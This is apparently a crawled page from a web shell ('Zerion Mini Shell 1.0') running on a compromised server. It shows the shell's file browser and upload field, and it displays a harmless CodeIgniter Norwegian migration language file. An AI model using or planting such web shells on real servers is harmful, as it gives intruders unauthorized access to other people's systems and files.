ok

Mini Shell

Direktori : /proc/thread-self/root/home2/selectio/www/bharath/system/language/norwegian/
Upload File :
Current File : //proc/thread-self/root/home2/selectio/www/bharath/system/language/norwegian/migration_lang.php

<?php
/**
 * System messages translation for CodeIgniter(tm)
 *
 * @author	CodeIgniter community
 * @copyright	Copyright (c) 2014 - 2017, British Columbia Institute of Technology (http://bcit.ca/)
 * @license	http://opensource.org/licenses/MIT	MIT License
 * @link	https://codeigniter.com
 */
defined('BASEPATH') OR exit('No direct script access allowed');

$lang['migration_none_found']		= 'Ingen migrasjoner ble funnet.';
$lang['migration_not_found']		= 'Ingen migrasjon funner med følgende versjonsnummer: %s.';
$lang['migration_sequence_gap']		= 'Det er en glippe i migrasjonssekvensen nær versjonsnummer: %s.';
$lang['migration_multiple_version']	= 'Det er flere migrasjoner med samme versjonsnummer: %s.';
$lang['migration_class_doesnt_exist']	= 'Fant ikke migrasjonsklassen «%s».';
$lang['migration_missing_up_method']	= 'Migrasjonsklassen «%s» mangler en «up»-metode.';
$lang['migration_missing_down_method']	= 'Migrasjonsklassen «%s» mangler en «down»-metode.';
$lang['migration_invalid_filename']	= 'Migrasjon «%s» har et ugyldig filnavn.';

Zerion Mini Shell 1.0